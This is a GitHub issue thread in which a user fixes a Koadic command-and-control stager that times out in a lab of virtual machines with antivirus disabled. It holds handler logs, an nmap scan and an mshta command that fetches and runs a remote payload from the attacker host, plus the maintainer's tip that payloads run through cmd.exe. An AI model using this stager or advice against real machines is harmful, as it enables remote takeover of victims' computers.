### ISSUE TITLE
Timed out

### ISSUE THREAD

**Issue by dlimanov** [zerosum0x0/koadic#148]
Underlying system:
Mac OS X Big Sur
Parallels Desktop 15

Attacker:
Ubuntu 20.04.2 LTS VM
iptables = off

Target:
Windows10 x64 Pro VM
Build 18363.1379
AV = off
Firewall = off

Getting the following:
[v] handler::handle() - Incoming HTTP from ('10.211.55.18', 49866)
[v] handler::parse_params() - Host header present: 10.211.55.28:9999
[v] handler::handle_new_session()
[+] Zombie 7: Staging new connection (10.211.55.18) on Stager 0
[v] handler::reply() - sending status 500 with 27234 bytes to ('10.211.55.18', 49866)
[v] handler::handle() - Incoming HTTP from ('10.211.55.18', 49869)
[v] handler::reply() - sending status 404 with 0 bytes to ('10.211.55.18', 49869)
[!] Zombie 7: Timed out.

Am able to ping/portscan the victim from attacking machine just fine:
$ nmap 10.211.55.18
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-24 12:26 EDT
Nmap scan report for 10.211.55.18
Host is up (0.00027s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Obviously, some kind of network communication issue between the two during the initial stage but for the life of me can't figure out what.

**Comment by TheNaterz** [comment]
I don't think this is a network communications issue, looks more like a parsing issue. Either Koadic is having trouble identifying the correct listener for the staged zombie or the target is mangling the URL, I'm not sure which.

Pull and test again, I added some more verbose statements that will show us what the path looks like and what Koadic is parsing the endpoint as.

**Comment by dlimanov** [comment]
Here goes after a fresh pull:

(koadic: sta/js/mshta)$ verbose 1
[*] Verbose mode: On
(koadic: sta/js/mshta)$ run
[+] Spawned a stager at http://10.211.55.28:9999/1wH9L
[>] mshta http://10.211.55.28:9999/1wH9L
(koadic: sta/js/mshta)$ 
[v] handler::handle() - Incoming HTTP from ('10.211.55.18', 50010)
[v] handler::handle() - Incoming HTTP from ('10.211.55.18', 50011)
[v] handler::parse_params() - path = /1wH9L
[v] handler::find_stager() - endpoint identified = 1wH9L
[v] handler::parse_params() - Host header present: 10.211.55.28:9999
[v] handler::handle_new_session()
[+] Zombie 0: Staging new connection (10.211.55.18) on Stager 0
[v] handler::reply() - sending status 500 with 27304 bytes to ('10.211.55.18', 50011)
[!] Zombie 0: Timed out.

Not seeing the 404 but otherwise looks to be the same.

**Comment by TheNaterz** [comment]
Koadic payloads are not launched through a browser. Koadic payloads are executed as commands. You can either paste the entire payload into cmd.exe or you can paste the payload into some other tool that runs commands remotely.

**Comment by dlimanov** [comment]
Boy, do I feel stupid! Apologies for wasting your cycles, Naterz!
